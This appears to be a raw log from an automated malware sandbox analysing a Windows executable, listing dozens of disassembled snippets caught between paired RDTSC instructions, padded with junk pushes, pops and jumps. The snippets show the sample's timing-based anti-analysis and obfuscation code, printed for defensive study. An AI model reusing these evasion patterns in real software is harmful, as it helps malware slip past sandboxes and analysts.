Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 86C129 second address: 86C157 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D7h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F83146B40D1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 86BCD7 second address: 86BD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8314EA9191h 0x00000009 pop esi 0x0000000a pushad 0x0000000b jng 00007F8314EA9186h 0x00000011 jmp 00007F8314EA918Eh 0x00000016 pushad 0x00000017 popad 0x00000018 jne 00007F8314EA9186h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 86BD0B second address: 86BD25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 86BE56 second address: 86BE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8710C1 second address: 8710C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8710C5 second address: 8710C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8710C9 second address: 8710DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F83146B40C6h 0x0000000e je 00007F83146B40C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 870A96 second address: 870A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 870A9A second address: 870AA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 870AA0 second address: 870AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8763E0 second address: 8763E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 87E222 second address: 87E22E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8314EA9186h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 87E086 second address: 87E0C3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F83146B40DEh 0x00000008 jmp 00007F83146B40D8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F83146B40D8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 87E0C3 second address: 87E0C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 881551 second address: 881557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 881557 second address: 881570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F8314EA9188h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 881570 second address: 881574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8838E4 second address: 8838EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8838EA second address: 88391B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F83146B40CEh 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jc 00007F83146B40C6h 0x00000014 jne 00007F83146B40C6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F83146B40CCh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8879E7 second address: 8879EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8879EC second address: 8879F6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F83146B40CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 887B39 second address: 887B45 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8314EA9186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 887B45 second address: 887B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 887B5C second address: 887B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 887EC4 second address: 887ED7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F83146B40C6h 0x00000008 jnl 00007F83146B40C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 887ED7 second address: 887EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 887EDC second address: 887EE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 887EE2 second address: 887EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 88805F second address: 888065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 888065 second address: 888070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 888070 second address: 888075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 888075 second address: 88807A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 88C6FB second address: 88C701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 88C701 second address: 88C709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 88C709 second address: 88C718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F83146B40C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 88C718 second address: 88C71E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8975B0 second address: 8975CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jl 00007F83146B40C6h 0x0000000c jp 00007F83146B40C6h 0x00000012 pop edx 0x00000013 jo 00007F83146B40D8h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8975CF second address: 8975D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8A5291 second address: 8A52B3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F83146B40C6h 0x00000008 jmp 00007F83146B40D1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8A512E second address: 8A5148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8314EA9191h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8A5148 second address: 8A515D instructions: 0x00000000 rdtsc 0x00000002 je 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnl 00007F83146B40C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8AACE1 second address: 8AAD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8314EA9199h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8AA81A second address: 8AA833 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F83146B40CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F83146B40C8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8AA833 second address: 8AA83B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8AA83B second address: 8AA83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8AA83F second address: 8AA895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9198h 0x00000007 jmp 00007F8314EA9199h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F8314EA9198h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8AA895 second address: 8AA89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8AA89A second address: 8AA8A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8AA8A1 second address: 8AA8A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8AE4B6 second address: 8AE4BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8AE4BE second address: 8AE4C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C19A3 second address: 8C19A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C1B4C second address: 8C1B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F83146B40D3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C1B66 second address: 8C1B82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9192h 0x00000007 jne 00007F8314EA9186h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C1FD7 second address: 8C2006 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F83146B40CAh 0x00000008 jmp 00007F83146B40CAh 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F83146B40D2h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C2323 second address: 8C236F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F8314EA9198h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F8314EA9190h 0x00000016 jl 00007F8314EA9186h 0x0000001c ja 00007F8314EA9186h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 pushad 0x00000026 jne 00007F8314EA9186h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C24FD second address: 8C2501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C2622 second address: 8C262B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C262B second address: 8C2668 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F83146B40D7h 0x00000011 jnp 00007F83146B40CCh 0x00000017 jne 00007F83146B40C6h 0x0000001d push edx 0x0000001e jmp 00007F83146B40CBh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C6BC9 second address: 8C6BCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C6DE7 second address: 8C6DF4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C6DF4 second address: 8C6E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 mov edx, 62EE8640h 0x0000000c cmc 0x0000000d push 00000004h 0x0000000f jmp 00007F8314EA9192h 0x00000014 call 00007F8314EA918Fh 0x00000019 add dword ptr [ebp+122D2397h], edx 0x0000001f pop edx 0x00000020 call 00007F8314EA9189h 0x00000025 push eax 0x00000026 push edx 0x00000027 jg 00007F8314EA9197h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C6E4D second address: 8C6EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F83146B40D1h 0x00000008 jo 00007F83146B40C6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F83146B40D7h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c jl 00007F83146B40C8h 0x00000022 push edi 0x00000023 pop edi 0x00000024 pushad 0x00000025 push edi 0x00000026 pop edi 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 popad 0x0000002a popad 0x0000002b mov eax, dword ptr [eax] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007F83146B40CAh 0x00000035 jne 00007F83146B40C6h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C6EAC second address: 8C6EE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8314EA9199h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8C89BB second address: 8C8A0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jns 00007F83146B40C6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F83146B40CDh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a jmp 00007F83146B40D7h 0x0000001f pushad 0x00000020 jmp 00007F83146B40D3h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B08AF second address: 51B08B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B08B3 second address: 51B08C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B08C2 second address: 51B08C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B08C8 second address: 51B08CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B08CC second address: 51B0959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F8314EA918Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov si, 86DDh 0x00000016 pushfd 0x00000017 jmp 00007F8314EA918Ah 0x0000001c sbb eax, 4C824138h 0x00000022 jmp 00007F8314EA918Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c movzx esi, di 0x0000002f pushfd 0x00000030 jmp 00007F8314EA9191h 0x00000035 or cx, 77D6h 0x0000003a jmp 00007F8314EA9191h 0x0000003f popfd 0x00000040 popad 0x00000041 xchg eax, ecx 0x00000042 jmp 00007F8314EA918Eh 0x00000047 push eax 0x00000048 jmp 00007F8314EA918Bh 0x0000004d xchg eax, ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B0959 second address: 51B095D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B095D second address: 51B0978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9197h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B0978 second address: 51B0A29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov esi, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c jmp 00007F83146B40CAh 0x00000011 mov dword ptr [esp], esi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F83146B40CEh 0x0000001b and eax, 2777D1E8h 0x00000021 jmp 00007F83146B40CBh 0x00000026 popfd 0x00000027 call 00007F83146B40D8h 0x0000002c mov ax, D2E1h 0x00000030 pop esi 0x00000031 popad 0x00000032 lea eax, dword ptr [ebp-04h] 0x00000035 jmp 00007F83146B40CDh 0x0000003a nop 0x0000003b pushad 0x0000003c pushad 0x0000003d mov si, 5E89h 0x00000041 pushfd 0x00000042 jmp 00007F83146B40D6h 0x00000047 sbb esi, 670409D8h 0x0000004d jmp 00007F83146B40CBh 0x00000052 popfd 0x00000053 popad 0x00000054 push eax 0x00000055 call 00007F83146B40CFh 0x0000005a pop ecx 0x0000005b pop ebx 0x0000005c popad 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B0A29 second address: 51B0A59 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8314EA918Eh 0x00000008 sbb eax, 70563B68h 0x0000000e jmp 00007F8314EA918Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 movzx eax, dx 0x00000019 popad 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B0A59 second address: 51B0A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B0A75 second address: 51B0A9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8314EA9195h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B0A9E second address: 51B0AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83146B40CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B0AF8 second address: 51B0AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B0AFE second address: 51B0B36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a pushad 0x0000000b mov bx, 2760h 0x0000000f mov ax, dx 0x00000012 popad 0x00000013 je 00007F83146B40FFh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov di, si 0x0000001f jmp 00007F83146B40D8h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B0B5D second address: 51B0B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B0B63 second address: 51B0B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B0B67 second address: 51B0B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B0B6B second address: 51B0BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F83146B40D7h 0x00000012 and esi, 1ADC01AEh 0x00000018 jmp 00007F83146B40D9h 0x0000001d popfd 0x0000001e mov ah, BEh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51B0BB2 second address: 51A0010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 3Dh 0x00000005 pushfd 0x00000006 jmp 00007F8314EA9195h 0x0000000b sub ecx, 18B38096h 0x00000011 jmp 00007F8314EA9191h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a leave 0x0000001b pushad 0x0000001c mov dx, cx 0x0000001f movzx ecx, dx 0x00000022 popad 0x00000023 retn 0004h 0x00000026 nop 0x00000027 sub esp, 04h 0x0000002a xor ebx, ebx 0x0000002c cmp eax, 00000000h 0x0000002f je 00007F8314EA9328h 0x00000035 mov dword ptr [esp], 0000000Dh 0x0000003c call 00007F8319A2E241h 0x00000041 mov edi, edi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F8314EA918Ah 0x0000004c rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51A0010 second address: 51A0014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51A0014 second address: 51A001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
